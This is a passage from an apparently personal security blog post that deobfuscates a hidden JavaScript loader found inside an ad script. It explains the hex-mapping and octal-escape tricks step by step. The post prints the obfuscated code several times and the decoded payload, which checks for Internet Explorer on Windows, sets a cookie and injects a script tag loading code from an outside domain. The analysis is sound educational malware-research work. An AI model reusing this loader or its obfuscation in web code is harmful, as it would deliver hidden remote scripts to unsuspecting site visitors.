"\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\\"+\\\"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a.___+$a.__+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"='\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+"\\"+$a.__$+$a.$$_+$a.___+"://"+$a.$_$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.__$+$a.$$_+$a._$$+"."+$a.$_$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$$+$a._$_+"/"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+".\\"+$a.__$+$a.$_$+$a._$_+"\\"+$a.__$+$a.$$_+$a._$$+"?"+$a.$$__+"\\"+$a.__$+$a.$$_+$a.___+"="+$a.$_$_+$a.$$_$+".\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"-\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$$$+$a.__$+"."+$a.$$__+$a._$+"\\"+$a.__$+$a.$_$+$a.$_$+"'><" + "/\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\\"+\\\"\\"+$a.__$+$a.$$_+$a.___+$a.__+">\\\");}"+"\"")())();}catch(e){}
Now we should be able to prettify this code a bit. Sometimes formatting can help to reveal the intent of certain code segments:
try {
    $a = ~[];
    $a = {
        ___: ++$a,
        $$$$: (![] + "")[$a],
        __$: ++$a,
        $_$_: (![] + "")[$a],
        _$_: ++$a,
        $_$$: ({} + "")[$a],
        $$_$: ($a[$a] + "")[$a],
        _$$: ++$a,
        $$$_: (!"" + "")[$a],
        $__: ++$a,
        $_$: ++$a,
        $$__: ({} + "")[$a],
        $$_: ++$a,
        $$$: ++$a,
        $___: ++$a,
        $__$: ++$a
    };
    $a.$_ = ($a.$_ = $a + "")[$a.$_$] + ($a._$ = $a.$_[$a.__$]) + ($a.$$ = ($a.$ + "")[$a.__$]) + ((!$a) + "")[$a._$$] + ($a.__ = $a.$_[$a.$$_]) + ($a.$ = (!"" + "")[$a.__$]) + ($a._ = (!"" + "")[$a._$_]) + $a.$_[$a.$_$] + $a.__ + $a._$ + $a.$;
    $a.$$ = $a.$ + (!"" + "")[$a._$$] + $a.__ + $a._ + $a.$ + $a.$$;
    $a.$ = ($a.___)[$a.$_][$a.$_];
    $a.$($a.$($a.$$ + "\"" + $a.$$_$ + "=" + $a.$$_$ + $a._$ + $a.$$__ + $a._ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a.$$$_ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.__ + ";" + $a._ + $a.$_$_ + "=\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a.$$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$__ + $a.$$$ + $a.$_$_ + $a.__ + $a._$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "." + $a._ + "\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.___ + $a.__$ + "\\" + $a.__$ + $a.$__ + $a.$$$ + $a.$$$_ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.__ + ";\\" + $a.__$ + $a.$_$ + $a.__$ + $a.$$$$ + "(" + $a.$$_$ + "._\\" + $a.__$ + $a.$$$ + $a._$_ + "\\" + $a.__$ + $a.$$$ + $a.___ + "===" + $a._ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$$_$ + $a.$$$_ + $a.$$$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$$$_ + $a.$$_$ + "\\" + $a.$__ + $a.___ + "&&\\" + $a.$__ + $a.___ + $a.$$_$ + "." + $a.$$__ + $a._$ + $a._$ + "\\" + $a.__$ + $a.$_$ + $a._$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + $a.$$$_ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "('_" + $a._ + $a.__ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a._ + $a.$$_$ + "=')==-" + $a.__$ + "\\" + $a.$__ + $a.___ + "&&\\" + $a.$__ + $a.___ + $a._ + $a.$_$_ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "('\\" + $a.__$ + $a._$_ + $a.$$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$$_$ + $a._$ + "\\" + $a.__$ + $a.$$_ + $a.$$$ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.__$ + $a.$$_ + "\\" + $a.__$ + $a._$_ + $a.$__ + "\\" + $a.$__ + $a.___ + "')>" + $a.___ + "\\" + $a.$__ + $a.___ + "&&\\" + $a.$__ + $a.___ + $a._ + $a.$_$_ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "('\\" + $a.__$ + $a.__$ + $a.$_$ + "\\" + $a.__$ + $a._$_ + $a._$$ + "\\" + $a.__$ + $a.__$ + $a.__$ + "\\" + $a.__$ + $a.___ + $a.$_$ + "\\" + $a.$__ + $a.___ + "')>" + $a.___ + ")\\" + $a.$__ + $a.___ + "{" + $a.$$_$ + "._\\" + $a.__$ + $a.$$$ + $a._$_ + "\\" + $a.__$ + $a.$$$ + $a.___ + "=" + $a.__$ + ";" + $a.$$_$ + "." + $a.$$__ + $a._$ + $a._$ + "\\" + $a.__$ + $a.$_$ + $a._$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + $a.$$$_ + "='__" + $a._ + $a.__ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a._ + $a.$$_$ + "=" + $a.__$ + ";\\" + $a.$__ + $a.___ + $a.$$$_ + "\\" + $a.__$ + $a.$$$ + $a.___ + "\\" + $a.__$ + $a.$$_ + $a.___ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$$_ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "=\\" + $a.__$ + $a._$_ + $a.$$$ + $a.$$$_ + $a.$$_$ + ",\\" + $a.$__ + $a.___ + $a.___ + $a.__$ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.__$ + $a._$_ + $a.$_$_ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + "\\" + $a.$__ + $a.___ + $a._$_ + $a.___ + $a._$_ + $a.___ + "\\" + $a.$__ + $a.___ + $a.___ + $a.___ + ":" + $a.___ + $a.___ + ":" + $a.___ + $a.___ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a._$_ + $a.$_$ + "\\" + $a.__$ + $a._$_ + $a.$__ + "\\" + $a.__$ + $a.___ + $a._$$ + ";\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.$$_ + $a.___ + $a.$_$_ + $a.__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "=/';" + $a.$$_$ + ".\\" + $a.__$ + $a.$$_ + $a.$$$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + $a.__ + $a.$$$_ + (![] + "")[$a._$_] + "\\" + $a.__$ + $a.$_$ + $a.$$_ + "(\\\"<" + "\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$__ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\\"+\\\"\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$$_ + $a.___ + $a.__ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "='\\" + $a.__$ + $a.$_$ + $a.___ + $a.__ + $a.__ + "\\" + $a.__$ + $a.$$_ + $a.___ + "://" + $a.$_$$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "." + $a.$_$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$$$ + $a._$_ + "/" + $a.___ + $a.$$__ + $a.$$__ + $a._$_ + $a._$_ + $a.$$$ + $a.$_$ + $a.$$_ + ".\\" + $a.__$ + $a.$_$ + $a._$_ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "?" + $a.$$__ + "\\" + $a.__$ + $a.$$_ + $a.___ + "=" + $a.$_$_ + $a.$$_$ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$_$_ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a.$$$_ + "-\\" + $a.__$ + $a.$$_ + $a._$$ + $a.__ + $a._$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$$$ + $a.__$ + "." + $a.$$__ + $a._$ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + "'><" + "/\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$__ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\\"+\\\"\\" + $a.__$ + $a.$$_ + $a.___ + $a.__ + ">\\\");}" + "\"")())();
} catch (e) {}
Great! It's clear now that the code begins with an object declaration, and we can see why the whole code block is filled with dollar signs and underscores – all the attributes of the object named "$a" are named with various combinations of those two characters. Tricky!
    $a = ~[];
    $a = {
        ___: ++$a,
        $$$$: (![] + "")[$a],
        __$: ++$a,
        $_$_: (![] + "")[$a],
        _$_: ++$a,
        $_$$: ({} + "")[$a],
        $$_$: ($a[$a] + "")[$a],
        _$$: ++$a,
        $$$_: (!"" + "")[$a],
        $__: ++$a,
        $_$: ++$a,
        $$__: ({} + "")[$a],
        $$_: ++$a,
        $$$: ++$a,
        $___: ++$a,
        $__$: ++$a
    };
Let's see if we can't make sense of this. The very first line there uses a trick similar to another well-known obfuscation technique, JSFuck. In javascript, "~[]" evaluates to -1, so that is our starting value for the variable "$a." The variable is then re-declared as an object, and if we calculate all the attribute values, it looks like this:
    $a = -1;
    $a = {
  ___: 0,
  $$$$: "f",
  __$: 1,
  $_$_: "a",
  _$_: 2,
  $_$$: "b",
  $$_$: "d",
  _$$: 3,
  $$$_: "e",
  $__: 4,
  $_$: 5,
  $$__: "c",
  $$_: 6,
  $$$: 7,
  $___: 8,
  $__$: 9
 };
Hmm...notice anything about that set of values? That's right, it maps cleanly to hexadecimal. That means this array can be used to print any hex character. We're getting somewhere now! Let's have a look at the next few lines to see what we can make of them:
    $a.$_ = ($a.$_ = $a + "")[$a.$_$] + ($a._$ = $a.$_[$a.__$]) + ($a.$$ = ($a.$ + "")[$a.__$]) + ((!$a) + "")[$a._$$] + ($a.__ = $a.$_[$a.$$_]) + ($a.$ = (!"" + "")[$a.__$]) + ($a._ = (!"" + "")[$a._$_]) + $a.$_[$a.$_$] + $a.__ + $a._$ + $a.$;
    $a.$$ = $a.$ + (!"" + "")[$a._$$] + $a.__ + $a._ + $a.$ + $a.$$;
    $a.$ = ($a.___)[$a.$_][$a.$_];
Through some simple variable substitution and manual formatting for readability, we can translate these three lines into something much more clear:
 $a.$_=
  ($a.$_=$a+"")[5]+     // "c"
  ($a._$=$a.$_[1])+     // "o"
  ($a.$$=($a.$+"")[1])+ // "n"
  ((!$a)+"")[3]+        // "s"
  ($a.__=$a.$_[6])+     // "t"
  ($a.$=(!""+"")[1])+   // "r"
  ($a._=(!""+"")[2])+   // "u"
  $a.$_[5]+             // "c"
  $a.__+                // "t"
  $a._$+                // "o"
  $a.$;                 // "r"
 $a.$$=
  $a.$+                 // "r"
  (!""+"")[3]+          // "e"
  $a.__+                // "t"
  $a._+                 // "u"
  $a.$+                 // "r"
  $a.$$;                // "n"
 $a.$=(0)["constructor"]["constructor"];
Excellent! Now we see that "$a.$_" just contains the string "constructor" and "$a.$$" contains another string, "return." The third variable, "$a.$" is a line of code that serves as an anonymous function declaration for whatever code is passed to it. Another way to write it would be like this:
$a.$ = function Function() { [native code] }
The code would be invoked like so:
$a.$("arbitrary javascript here");
Now there's just one big line of code left to deobfuscate. At this point it seems that we have enumerated all the relevant variables, so we'll perform some substitution to replace the relevant bits of code with the corresponding values. Order of operations is important once again, because e.g. if we choose to substitute variables named "$a.$$$" first, then variables named "$a.$$$$" will get partially overwritten and won't substitute correctly. Here's the order we'll follow to make sure we don't screw up the code:
$a.$_$_: "a"
$a.$_$$: "b"
$a.$$__: "c"
$a.$$_$: "d"
$a.$$$_: "e"
$a.$$$$: "f"
$a.$__$: 9
$a.$___: 8
$a.$$$: 7
$a.$$_: 6
$a.$_$: 5
$a.$__: 4
$a._$$: 3
$a._$_: 2
$a.__$: 1
$a.___: 0
$a.$_: "c"
$a._$: "o"
$a.$$: "n"
$a.__: "t"
$a._: "u"
$a.$: function Function() { [native code] }
A simple round of find & replace with each variable from top to bottom results in the following code:
try {
 function Function1() {
  function Function2() {
   "n" + "\"" + "d" + "=" + "d" + "o" + "c" + "u" + "\\" + 1 + 5 + 5 + "e" + "\\" + 1 + 5 + 6 + "t" + ";" + "u" + "a" + "=\\" + 1 + 5 + 6 + "a" + "\\" + 1 + 6 + 6 + "\\" + 1 + 5 + 1 + "\\" + 1 + 4 + 7 + "a" + "t" + "o" + "\\" + 1 + 6 + 2 + "." + "u" + "\\" + 1 + 6 + 3 + "e" + "\\" + 1 + 6 + 2 + "\\" + 1 + 0 + 1 + "\\" + 1 + 4 + 7 + "e" + "\\" + 1 + 5 + 6 + "t" + ";\\" + 1 + 5 + 1 + "f" + "(" + "d" + "._\\" + 1 + 7 + 2 + "\\" + 1 + 7 + 0 + "===" + "u" + "\\" + 1 + 5 + 6 + "d" + "e" + "f" + "\\" + 1 + 5 + 1 + "\\" + 1 + 5 + 6 + "e" + "d" + "\\" + 4 + 0 + "&&\\" + 4 + 0 + "d" + "." + "c" + "o" + "o" + "\\" + 1 + 5 + 3 + "\\" + 1 + 5 + 1 + "e" + ".\\" + 1 + 6 + 3 + "e" + "a" + "\\" + 1 + 6 + 2 + "c" + "\\" + 1 + 5 + 0 + "('_" + "u" + "t" + "\\" + 1 + 5 + 5 + "u" + "d" + "=')==-" + 1 + "\\" + 4 + 0 + "&&\\" + 4 + 0 + "u" + "a" + ".\\" + 1 + 6 + 3 + "e" + "a" + "\\" + 1 + 6 + 2 + "c" + "\\" + 1 + 5 + 0 + "('\\" + 1 + 2 + 7 + "\\" + 1 + 5 + 1 + "\\" + 1 + 5 + 6 + "d" + "o" + "\\" + 1 + 6 + 7 + "\\" + 1 + 6 + 3 + "\\" + 4 + 0 + "\\" + 1 + 1 + 6 + "\\" + 1 + 2 + 4 + "\\" + 4 + 0 + "')>" + 0 + "\\" + 4 + 0 + "&&\\" + 4 + 0 + "u" + "a" + ".\\" + 1 + 6 + 3 + "e" + "a" + "\\" + 1 + 6 + 2 + "c" + "\\" + 1 + 5 + 0 + "('\\" + 1 + 1 + 5 + "\\" + 1 + 2 + 3 + "\\" + 1 + 1 + 1 + "\\" + 1 + 0 + 5 + "\\" + 4 + 0 + "')>" + 0 + ")\\" + 4 + 0 + "{" + "d" + "._\\" + 1 + 7 + 2 + "\\" + 1 + 7 + 0 + "=" + 1 + ";" + "d" + "." + "c" + "o" + "o" + "\\" + 1 + 5 + 3 + "\\" + 1 + 5 + 1 + "e" + "='__" + "u" + "t" + "\\" + 1 + 5 + 5 + "u" + "d" + "=" + 1 + ";\\" + 4 + 0 + "e" + "\\" + 1 + 7 + 0 + "\\" + 1 + 6 + 0 + "\\" + 1 + 5 + 1 + "\\" + 1 + 6 + 2 + "e" + "\\" + 1 + 6 + 3 + "=\\" + 1 + 2 + 7 + "e" + "d" + ",\\" + 4 + 0 + 0 + 1 + "\\" + 4 + 0 + "\\" + 1 + 1 + 2 + "a" + "\\" + 1 + 5 + 6 + "\\" + 4 + 0 + 2 + 0 + 2 + 0 + "\\" + 4 + 0 + 0 + 0 + ":" + 0 + 0 + ":" + 0 + 0 + "\\" + 4 + 0 + "\\" + 1 + 2 + 5 + "\\" + 1 + 2 + 4 + "\\" + 1 + 0 + 3 + ";\\" + 4 + 0 + "\\" + 1 + 6 + 0 + "a" + "t" + "\\" + 1 + 5 + 0 + "=/';" + "d" + ".\\" + 1 + 6 + 7 + "\\" + 1 + 6 + 2 + "\\" + 1 + 5 + 1 + "t" + "e" + (![] + "")[2] + "\\" + 1 + 5 + 6 + "(\\\"<" + "\\" + 1 + 6 + 3 + "c" + "\\" + 1 + 6 + 2 + "\\\"+\\\"\\" + 1 + 5 + 1 + "\\" + 1 + 6 + 0 + "t" + "\\" + 4 + 0 + "\\" + 1 + 6 + 3 + "\\" + 1 + 6 + 2 + "c" + "='\\" + 1 + 5 + 0 + "t" + "t" + "\\" + 1 + 6 + 0 + "://" + "b" + "\\" + 1 + 6 + 2 + "\\" + 1 + 5 + 1 + "\\" + 1 + 5 + 6 + "\\" + 1 + 6 + 3 + "." + "b" + "\\" + 1 + 5 + 1 + "\\" + 1 + 7 + 2 + "/" + 0 + "c" + "c" + 2 + 2 + 7 + 5 + 6 + ".\\" + 1 + 5 + 2 + "\\" + 1 + 6 + 3 + "?" + "c" + "\\" + 1 + 6 + 0 + "=" + "a" + "d" + ".\\" + 1 + 6 + 3 + "a" + "\\" + 1 + 5 + 5 + "e" + "-\\" + 1 + 6 + 3 + "t" + "o" + "\\" + 1 + 6 + 2 + "\\" + 1 + 7 + 1 + "." + "c" + "o" + "\\" + 1 + 5 + 5 + "'><" + "/\\" + 1 + 6 + 3 + "c" + "\\" + 1 + 6 + 2 + "\\" + 1 + 5 + 1 + "\\\"+\\\"\\" + 1 + 6 + 0 + "t" + ">\\\");}" + "\""
  }
 }
} catch (e) {}
We're approaching readability now. Let's concatenate everything together and see how it looks. There's also one snippet of code in the middle we need to evaluate:
(![] + "")[2] -> evaluates to the letter "l"
Here's the resulting code block:
try {
 function Function1() {
  function Function2() {
   "n\"d=docu\\155e\\156t;ua=\\156a\\166\\151\\147ato\\162.u\\163e\\162\\101\\147e\\156t;\\151f(d._\\172\\170===u\\156def\\151\\156ed\\40&&\\40d.coo\\153\\151e.\\163ea\\162c\\150('_ut\\155ud=')==-1\\40&&\\40ua.\\163ea\\162c\\150('\\127\\151\\156do\\167\\163\\40\\116\\124\\40')>0\\40&&\\40ua.\\163ea\\162c\\150('\\115\\123\\111\\105\\40')>0)\\40{d._\\172\\170=1;d.coo\\153\\151e='__ut\\155ud=1;\\40e\\170\\160\\151\\162e\\163=\\127ed,\\4001\\40\\112a\\156\\402020\\4000:00:00\\40\\125\\124\\103;\\40\\160at\\150=/';d.\\167\\162\\151tel\\156(\\\"<\\163c\\162\\\"+\\\"\\151\\160t\\40\\163\\162c='\\150tt\\160://b\\162\\151\\156\\163.b\\151\\172/0cc22756.\\152\\163?c\\160=ad.\\163a\\155e-\\163to\\162\\171.co\\155'></\\163c\\162\\151\\\"+\\\"\\160t>\\\");}\""
  }
 }
} catch (e) {}
So close now! Let's extract the code from inside the nested function blocks for another round of deobfuscation. We can see that some characters are escaped in there, so we'll do the same thing we did before and unescape backslashes, followed by quotes:
n"d=docu\155e\156t;ua=\156a\166\151\147ato\162.u\163e\162\101\147e\156t;\151f(d._\172\170===u\156def\151\156ed\40&&\40d.coo\153\151e.\163ea\162c\150('_ut\155ud=')==-1\40&&\40ua.\163ea\162c\150('\127\151\156do\167\163\40\116\124\40')>0\40&&\40ua.\163ea\162c\150('\115\123\111\105\40')>0)\40{d._\172\170=1;d.coo\153\151e='__ut\155ud=1;\40e\170\160\151\162e\163=\127ed,\4001\40\112a\156\402020\4000:00:00\40\125\124\103;\40\160at\150=/';d.\167\162\151tel\156(\"<\163c\162\"+\"\151\160t\40\163\162c='\150tt\160://b\162\151\156\163.b\151\172/0cc22756.\152\163?c\160=ad.\163a\155e-\163to\162\171.co\155'></\163c\162\151\"+\"\160t>\");}"
The 'n' at the beginning of the string seems to indicate some kind of template literal, although in my research I wasn't able to determine exactly how it works. If anybody can fill in this gap in my understanding, please leave a comment. Regardless, if we drop the 'n,' unescape quotes yet again, and concatenate the strings together, we get the following result:
d=docu\155e\156t;ua=\156a\166\151\147ato\162.u\163e\162\101\147e\156t;\151f(d._\172\170===u\156def\151\156ed\40&&\40d.coo\153\151e.\163ea\162c\150('_ut\155ud=')==-1\40&&\40ua.\163ea\162c\150('\127\151\156do\167\163\40\116\124\40')>0\40&&\40ua.\163ea\162c\150('\115\123\111\105\40')>0)\40{d._\172\170=1;d.coo\153\151e='__ut\155ud=1;\40e\170\160\151\162e\163=\127ed,\4001\40\112a\156\402020\4000:00:00\40\125\124\103;\40\160at\150=/';d.\167\162\151tel\156("<\163c\162\151\160t\40\163\162c='\150tt\160://b\162\151\156\163.b\151\172/0cc22756.\152\163?c\160=ad.\163a\155e-\163to\162\171.co\155'></\163c\162\151\160t>");}
Now we're starting to see parts of recognizable commands – at the beginning we see what is probably a "document" attribute being assigned to a variable named "d." But what are all those numbers preceded by backslashes? As it turns out, this is a rather obscure use of string literals – after a bit of research, we learn that a backslash followed by up to three digits in a string is interpreted by javascript engines as a character with octal encoding. Let's decode these and see what we get:
d=document;ua=navigator.userAgent;if(d._zx===undefined && d.cookie.search('_utmud=')==-1 && ua.search('Windows NT ')>0 && ua.search('MSIE ')>0) {d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';d.writeln("<script src='http://brins.biz/0cc22756.js?cp=ad.same-story.com'></script>");}
Bingo! We finally have our payload.

Step 4: Final Analysis

In order to determine what the payload does, let's prettify it:
d = document;
ua = navigator.userAgent;
if (d._zx === undefined && d.cookie.search('_utmud=') == -1 && ua.search('Windows NT ') > 0 && ua.search('MSIE ') > 0) {
    d._zx = 1;
    d.cookie = '__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';
    d.writeln("<script src='http://brins.biz/0cc22756.js?cp=ad.same-story.com'></script>");
}
Now it becomes quite easy to understand what this code is doing. First it checks some preconditions: it looks for a tracking cookie to make sure the script wasn't run before, and it checks the user agent to see if the browser is Internet Explorer. If those conditions are met, it sets a variable on the document, places a tracking cookie, and writes a line of javascript to the page. VirusTotal clearly shows this secondary script is malicious:
Sadly, the malicious domain was no longer resolvable at the time this article was written, so an analysis of the secondary payload was not possible (kill chain broken, hooray!). Without the capability to analyze that script, we just have to trust that the antivirus detections in VirusTotal are accurate. From that, we can conclude that a malicious javascript payload was intended to be injected into a page and executed by the victim's browser. The malicious code was embedded in another script that contained code for a (probably) legitimate ad framework.

Conclusion

In the end, the code given to me by a friend turned out to be adware with an unidentified malicious payload embedded. Whether the payload was delivered by the ad provider or injected by a third party cannot be determined without additional context, but the amount of work that went into obfuscating the payload clearly indicates that it was intended to remain hidden from casual inspection. All in all, I greatly enjoyed this exercise and learned a few new things along the way!
Subscribe to: Posts (Atom)